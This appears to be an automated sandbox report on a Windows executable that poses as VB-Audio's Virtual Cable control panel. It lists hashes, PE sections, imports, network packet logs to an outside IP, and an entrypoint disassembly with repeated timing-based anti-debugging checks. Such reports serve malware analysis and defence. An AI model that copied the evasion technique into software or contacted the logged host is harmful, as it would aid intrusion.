                                                                                                                                                Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Cyfj6XGbkd.exe
                                                                                                                                                File size:4247224
                                                                                                                                                MD5:63204eb716c856723a010747d58a6b00
                                                                                                                                                SHA1:7e97f00b4c3580cedee02c448ac9aeb54afefbd2
                                                                                                                                                SHA256:6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
                                                                                                                                                SHA512:4b00dc3d824d3526972f74b913cff2b1d0e12745de58bfe4ba6196088a17b2346b4ec019bdf923acc57c77f88aa7b17fa230100c6c35b6672c7a39bfa4953c2e
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                File Content Preview:MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:b595139bec4252a9

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x403bc3
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:3a057d8e2436bad9e0ae8c20a8d4d334

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:
                                                                                                                                                Signature Issuer:
                                                                                                                                                Signature Validation Error:
                                                                                                                                                Error Number:
                                                                                                                                                Not Before, Not After
                                                                                                                                                  Subject Chain
                                                                                                                                                    Version:
                                                                                                                                                    Thumbprint MD5:
                                                                                                                                                    Thumbprint SHA-1:
                                                                                                                                                    Thumbprint SHA-256:
                                                                                                                                                    Serial:

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    sub ebp, 18h
                                                                                                                                                    mov dword ptr [ebp-14h], 00403BC3h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019EA3h
                                                                                                                                                    mov eax, dword ptr [edx]
                                                                                                                                                    mov esi, esp
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    push edx
                                                                                                                                                    call edi
                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                    add ebx, eax
                                                                                                                                                    mov edx, dword ptr [edx]
                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 00000005h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Fh
                                                                                                                                                    pop ebx
                                                                                                                                                    inc edi
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    mov ebx, dword ptr [esp]
                                                                                                                                                    mov ecx, dword ptr [ebx]
                                                                                                                                                    call dword ptr [eax]
                                                                                                                                                    mov ebp, ecx
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    mov eax, 00403F45h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Ch
                                                                                                                                                    mov ecx, dword ptr [ecx]
                                                                                                                                                    mov ecx, esi
                                                                                                                                                    mov ecx, ebp
                                                                                                                                                    cmp eax, edx
                                                                                                                                                    mov edi, ebp
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push eax
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019EA1h
                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                    dec eax
                                                                                                                                                    imul eax, edx
                                                                                                                                                    mov edx, dword ptr [eax]
                                                                                                                                                    mov ebx, dword ptr [ecx]
                                                                                                                                                    add eax, edx
                                                                                                                                                    push ecx
                                                                                                                                                    pop eax
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 000013C5h
                                                                                                                                                    pushfd
                                                                                                                                                    pushad
                                                                                                                                                    xor ecx, ecx
                                                                                                                                                    rdtsc
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    xor eax, eax
                                                                                                                                                    rdtsc
                                                                                                                                                    sub ecx, eax
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    jne 00007F47FD019E9Eh
                                                                                                                                                    mov eax, ebx
                                                                                                                                                    call esi
                                                                                                                                                    mov ecx, dword ptr [edi]
                                                                                                                                                    imul eax, edx
                                                                                                                                                    call dword ptr [ebx]
                                                                                                                                                    dec edx
                                                                                                                                                    popad
                                                                                                                                                    popfd
                                                                                                                                                    push 00000079h

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                    • [ C ] VS98 (6.0) SP6 build 8804

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb8f00x8c.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000xc0590.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd20000x1eb8
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xb0000x1c4.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x92760xa000False0.565625data6.61275809173IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0xb0000x12dc0x2000False0.28466796875data3.67874100082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0xd0000x4ea40x4000False0.1611328125data1.88336858311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x120000xc05900xc1000False0.293020614071data5.94457194459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                    RT_BITMAP0x124e00xbf518dataFrenchFrance
                                                                                                                                                    RT_ICON0x121e00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576FrenchFrance
                                                                                                                                                    RT_MENU0xd19f80x3d4dataFrenchFrance
                                                                                                                                                    RT_GROUP_ICON0x124c80x14dataFrenchFrance
                                                                                                                                                    RT_VERSION0xd1dd00x3c0dataFrenchFrance
                                                                                                                                                    RT_MANIFEST0xd21900x3f9XML 1.0 document, ASCII text, with CRLF line terminatorsFrenchFrance

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllFlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
                                                                                                                                                    USER32.dllGetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
                                                                                                                                                    GDI32.dllSetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
                                                                                                                                                    ADVAPI32.dllRegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
                                                                                                                                                    SHELL32.dllShellExecuteA
                                                                                                                                                    SETUPAPI.dllSetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

                                                                                                                                                    Version Infos

                                                                                                                                                    DescriptionData
                                                                                                                                                    LegalCopyrightV.Burel2012-2015
                                                                                                                                                    InternalNameVBCABLE_ControlPanel
                                                                                                                                                    FileVersion1, 0, 3, 5
                                                                                                                                                    CompanyNameVB-AUDIO Software
                                                                                                                                                    CommentsVB-AUDIO Control Panel forVB-Audio Virtual Cable
                                                                                                                                                    ProductNameVBCABLE_ControlPanel
                                                                                                                                                    ProductVersion1, 0, 3, 5
                                                                                                                                                    FileDescriptionVB-AUDIO Virtual Cable Control Panel
                                                                                                                                                    OriginalFilenameVBCABLE_ControlPanel.exe
                                                                                                                                                    Translation0x0000 0x04b0

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    FrenchFrance

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 29, 2021 17:36:38.256937981 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.306694031 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.306782007 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.307451963 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.307509899 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.355701923 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.355820894 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379690886 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379713058 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379725933 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379738092 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379745007 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.379833937 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.392950058 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.392991066 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.439117908 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.439142942 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444030046 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444063902 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444089890 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444117069 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444120884 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.444150925 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.444159985 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.485577106 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.555047035 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.555078983 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.601149082 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.601165056 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.608758926 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.608782053 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609004974 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.609302998 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609328032 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.609415054 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:38.610405922 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.657092094 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.871623993 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.871685028 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.918102980 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.918132067 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932384968 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932411909 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932545900 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.932952881 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.932970047 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.933042049 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:40.933917999 CET8049725104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:40.985033989 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.548799992 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.594649076 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.595305920 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.603761911 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.603826046 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.653562069 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.653582096 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.686892033 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.695880890 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696003914 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696084023 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696084976 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.696126938 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.696185112 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.696902990 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.727946997 CET4972580192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.732964993 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.733454943 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.738434076 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.738558054 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.784315109 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.784346104 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807162046 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807198048 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807224989 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807250023 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807271957 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.807357073 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.807379961 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:46.876214027 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.255383968 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.255412102 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.302926064 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.302954912 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311367989 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311407089 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311429977 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311451912 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311466932 CET8049729104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:49.311543941 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:49.311564922 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:52.775774956 CET4972980192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.304384947 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.304445028 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:55.352152109 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.352173090 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358536005 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358561039 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358577013 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358596087 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.358608961 CET8049730104.21.23.16192.168.2.6

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 29, 2021 17:36:25.088690996 CET6026153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:25.145237923 CET53602618.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:26.123815060 CET5606153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:26.173882008 CET53560618.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:27.246218920 CET5833653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:27.296982050 CET53583368.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:29.067965031 CET5378153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:29.116146088 CET53537818.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:31.026458979 CET5406453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:31.077909946 CET53540648.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:35.485811949 CET5281153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:35.537560940 CET53528118.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:36.429775953 CET5529953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:36.477709055 CET53552998.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:37.372859001 CET6374553192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:37.424420118 CET53637458.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.183897018 CET5005553192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET53500558.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:38.614181042 CET6137453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:38.665256977 CET53613748.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:39.602166891 CET5033953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:39.651047945 CET53503398.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:44.965429068 CET6330753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:45.016309977 CET53633078.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.307152033 CET4969453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET53496948.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:46.616519928 CET5498253192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET53549828.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:55.323558092 CET5001053192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:36:55.371407986 CET53500108.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:01.078157902 CET6371853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:01.138761044 CET53637188.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.603930950 CET6211653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET53621168.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:13.479643106 CET6381653192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:13.538614035 CET53638168.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:14.001022100 CET5501453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:14.051728010 CET53550148.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:18.883923054 CET6220853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:18.947933912 CET53622088.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:22.242372036 CET5757453192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:22.304270029 CET53575748.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:25.115819931 CET5181853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:25.178251028 CET53518188.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:25.818749905 CET5662853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:25.875405073 CET53566288.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:26.384660959 CET6077853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.440682888 CET53607788.8.8.8192.168.2.6
